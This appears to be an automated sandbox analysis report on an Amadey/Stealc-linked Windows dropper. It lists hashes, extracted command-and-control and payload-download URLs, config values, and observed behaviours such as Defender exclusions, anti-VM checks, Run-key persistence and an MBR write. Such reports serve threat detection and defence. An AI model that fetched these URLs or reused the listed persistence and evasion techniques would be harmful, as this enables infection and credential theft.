Analysis
-
max time kernel
79s -
max time network
117s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20250314-en locale:en-us os:windows10-2004-x64 system -
submitted
26/03/2025, 05:10
Static task
static1
General
-
Target
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
-
Size
1.8MB
-
MD5
442fc32065555d167806a2a766454b88
-
SHA1
10882938da5aed6fe9e2d7df16919aca6e849eff
-
SHA256
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9
-
SHA512
c19e959174d1e266302d782ffb43ffdd891387c4121fa5949f20b6e7d932326f76a972c0bb55cdb4cf51bb49987cd69426100e745f20def59d90fa73add80fe7
-
SSDEEP
49152:TnkrXn/GImQqXv0k14QUpvyXW+rKKM2F0luHM4iON6I3sd1:TnkTn/Gqq/B17uvV+PMQMuse
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer, an antivirus disabler dropper 3 IoCs
resource | yara_rule
behavioral2/memory/8156-19418-0x00000000003D0000-0x000000000084E000-memory.dmp | healer
behavioral2/memory/8156-19419-0x00000000003D0000-0x000000000084E000-memory.dmp | healer
behavioral2/memory/8156-20622-0x00000000003D0000-0x000000000084E000-memory.dmp | healer
Healer family
-
Modifies security service 2 TTPs 2 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | reg.exe
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 64145b6cb6.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1ced906bca.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1072de6716.exe
Blocklisted process makes network request 1 IoCs
flow | pid | Process
104 | 5784 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
2472 | powershell.exe
7344 | powershell.exe
7672 | powershell.exe
7900 | powershell.exe
5784 | powershell.exe
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 10 IoCs
flow | pid | Process
35 | 5384 | svchost.exe
42 | 1904 | rapes.exe (×5)
28 | 1904 | rapes.exe
30 | 1904 | rapes.exe
40 | 1904 | rapes.exe
104 | 5784 | powershell.exe
Drops file in Drivers directory 3 IoCs
description | ioc | Process
File created | C:\Windows\System32\Drivers\4e6f50f4.sys | 923a15a9.exe
File created | C:\Windows\System32\Drivers\klupd_4e6f50f4a_arkmon.sys | 923a15a9.exe
File created | C:\Windows\System32\Drivers\klupd_4e6f50f4a_klbg.sys | 923a15a9.exe
Possible privilege escalation attempt 2 IoCs
pid | Process
4112 | takeown.exe
392 | icacls.exe
Sets service image path in registry 2 TTPs 6 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klark.sys" | 923a15a9.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_mark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_mark.sys" | 923a15a9.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_4e6f50f4a_arkmon.sys" | 923a15a9.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4e6f50f4\ImagePath = "System32\\Drivers\\4e6f50f4.sys" | 923a15a9.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_arkmon.sys" | 923a15a9.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klbg\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klbg.sys" | 923a15a9.exe
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1ced906bca.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1072de6716.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1072de6716.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 483d2fa8a0d53818306efeb32d3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 483d2fa8a0d53818306efeb32d3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 64145b6cb6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 64145b6cb6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1ced906bca.exe
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | 11.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | 7IIl2eE.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | rapes.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | apple.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation | 11.exe
Deletes itself 1 IoCs
pid | Process
3584 | w32tm.exe
Executes dropped EXE 17 IoCs
pid | Process
1904 | rapes.exe
2960 | apple.exe
3964 | 11.exe
1624 | 11.exe
2928 | f73ae_003.exe
1160 | 7IIl2eE.exe
2244 | tzutil.exe
3584 | w32tm.exe
13208 | rapes.exe
4512 | 73998ddf32.exe
8524 | 483d2fa8a0d53818306efeb32d3.exe
3692 | 64145b6cb6.exe
9516 | 1ced906bca.exe
9384 | 44ae5ee5.exe
10556 | 923a15a9.exe
6276 | 6a162b453f.exe
8156 | 1072de6716.exe
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine | 1ced906bca.exe
Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine | 1072de6716.exe
Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine | 64145b6cb6.exe
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys | 923a15a9.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys\ = "Driver" | 923a15a9.exe
Loads dropped DLL 26 IoCs
pid | Process
10556 | 923a15a9.exe (×26)
Modifies file permissions 1 TTPs 2 IoCs
pid | Process
4112 | takeown.exe
392 | icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338050121\\am_no.cmd" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\64145b6cb6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338170101\\64145b6cb6.exe" | rapes.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\61a99688-3ceb-422b-89c3-50229b6b9c76 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{ff499140-fbb0-4a6a-8812-a68293f59bd9}\\61a99688-3ceb-422b-89c3-50229b6b9c76.cmd\"" | 923a15a9.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1ced906bca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338180101\\1ced906bca.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a162b453f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338190101\\6a162b453f.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1072de6716.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338200101\\1072de6716.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" | svchost.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\F: | 923a15a9.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PhysicalDrive0 | 923a15a9.exe
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x00020000000232f2-19123.dat | autoit_exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid | Process
9616 | tasklist.exe
13256 | tasklist.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid | Process
5608 | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
1904 | rapes.exe
13208 | rapes.exe
8524 | 483d2fa8a0d53818306efeb32d3.exe
3692 | 64145b6cb6.exe
9516 | 1ced906bca.exe
8156 | 1072de6716.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 4512 set thread context of 2600 | 4512 | 73998ddf32.exe | 200
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | 44ae5ee5.exe
File opened (read-only) | \??\VBoxMiniRdrDN | 923a15a9.exe
Drops file in Program Files directory 64 IoCs
description | ioc | Process
File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\shellext.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\shellext.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\shellext.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui | cmd.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui | cmd.exe
File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | cmd.exe
Drops file in Windows directory 14 IoCs
description | ioc | Process
File opened for modification | C:\Windows\GentleLogging | 7IIl2eE.exe
File opened for modification | C:\Windows\LogisticsNotre | 7IIl2eE.exe
File opened for modification | C:\Windows\ProvidingMilwaukee | 7IIl2eE.exe
File opened for modification | C:\Windows\EstateLegislative | 7IIl2eE.exe
File opened for modification | C:\Windows\CorrectionsGeographic | 7IIl2eE.exe
File opened for modification | C:\Windows\RowTopics | 7IIl2eE.exe
File opened for modification | C:\Windows\EnglandDeleted | 7IIl2eE.exe
File opened for modification | C:\Windows\PotteryUser | 7IIl2eE.exe
File opened for modification | C:\Windows\SpecificsHeaven | 7IIl2eE.exe
File created | C:\Windows\Tasks\rapes.job | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
File opened for modification | C:\Windows\WallpapersHo | 7IIl2eE.exe
File opened for modification | C:\Windows\JenniferSubdivision | 7IIl2eE.exe
File opened for modification | C:\Windows\BrandonStat | 7IIl2eE.exe
File opened for modification | C:\Windows\DiscussedFacial | 7IIl2eE.exe
Launches sc.exe 38 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
sc.exe (38 instances), pids: 5524, 5100, 3548, 5828, 376, 904, 1064, 1492, 2128, 4280, 624, 2248, 1468, 5268, 2192, 928, 4380, 4040, 4580, 856, 3536, 5712, 3272, 428, 4200, 5920, 5388, 2464, 5344, 2536, 4620, 3056, 1996, 3916, 756, 5420, 5416, 2996
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1ced906bca.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1072de6716.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MSBuild.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 6a162b453f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | apple.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | f73ae_003.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 11.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 483d2fa8a0d53818306efeb32d3.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | 6a162b453f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 7IIl2eE.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 64145b6cb6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 44ae5ee5.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 923a15a9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | 6a162b453f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 11.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CMD.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rapes.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Delays execution with timeout.exe 2 IoCs
pid | Process
1132 | timeout.exe
5068 | timeout.exe
Kills process with taskkill 5 IoCs
pid | Process
11556 | taskkill.exe
12980 | taskkill.exe
7136 | taskkill.exe
1832 | taskkill.exe
7368 | taskkill.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
8140 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid | Process
5608 | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe (×2)
1904 | rapes.exe (×2)
2472 | powershell.exe (×3)
13208 | rapes.exe (×2)
7344 | powershell.exe (×3)
7672 | powershell.exe (×3)
7900 | powershell.exe (×3)
5784 | powershell.exe (×3)
2600 | MSBuild.exe (×4)
8524 | 483d2fa8a0d53818306efeb32d3.exe (×2)
3692 | 64145b6cb6.exe (×6)
9516 | 1ced906bca.exe (×2)
6276 | 6a162b453f.exe (×4)
8156 | 1072de6716.exe (×5)
Suspicious behavior: LoadsDriver 6 IoCs
pid | Process
652 | Process not Found (×2)
10556 | 923a15a9.exe (×4)
Suspicious behavior: MapViewOfSection 3 IoCs
pid | Process
2928 | f73ae_003.exe (×3)
Suspicious use of AdjustPrivilegeToken 50 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2472 | powershell.exe
Token: SeDebugPrivilege | 7344 | powershell.exe
Token: SeDebugPrivilege | 7672 | powershell.exe
